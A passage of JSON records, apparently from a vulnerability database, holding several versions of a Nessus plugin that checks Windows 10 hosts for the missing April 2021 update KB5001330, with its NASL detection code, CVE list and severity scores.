audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-07T15:43:01", "differentElements": ["vpr"], "edition": 8}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "0960a91bdb0da7ebf0b679990f17ded5", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-08T14:21:30", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001387.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-28441", "CVE-2021-27086", "CVE-2021-28324", "CVE-2021-27092", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-26417", "CVE-2021-27090", "CVE-2021-28312", "CVE-2021-28314"]}, {"type": "mskb", "idList": ["KB5001330", "KB5001292"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-28319/"]}], "modified": "2021-08-08T14:21:30", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-08T14:21:30", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-08T14:21:30", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "c021f62f320803a0b53667838bd12918", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-13T23:39:28", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001337.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-26416", "CVE-2021-28324", "CVE-2021-27086", "CVE-2021-28357", "CVE-2021-27092", "CVE-2021-27088", "CVE-2021-27090", "CVE-2021-28314", "CVE-2021-28438", "CVE-2021-28441"]}, {"type": "mskb", "idList": ["KB5001330", "KB5001292"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28325/"]}], "modified": "2021-08-13T23:39:28", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-13T23:39:28", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n 